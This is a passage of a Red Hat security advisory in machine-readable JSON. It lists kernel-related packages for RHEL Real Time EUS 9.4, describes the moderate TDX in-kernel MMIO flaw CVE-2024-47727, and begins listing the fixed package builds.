"product_id": "RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47727",
"cwe": {
"id": "CWE-754",
"name": "Improper Check for Unusual or Exceptional Conditions"
},
"discovery_date": "2024-10-21T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2320259"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. Userspace can deceive the kernel into performing MMIO (Memory-Mapped IO) operations in TDX (Trust Domain Extensions) on its behalf, allowing a #VE (Virtualization Exception) to be incorrectly handled as a in-kernel MMIO operation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: x86/tdx: Fix \"in-kernel MMIO\" check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw can only cause a denial of service by an attacker with normal privileges, limiting the impact of this vulnerability.\nFor this reason, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
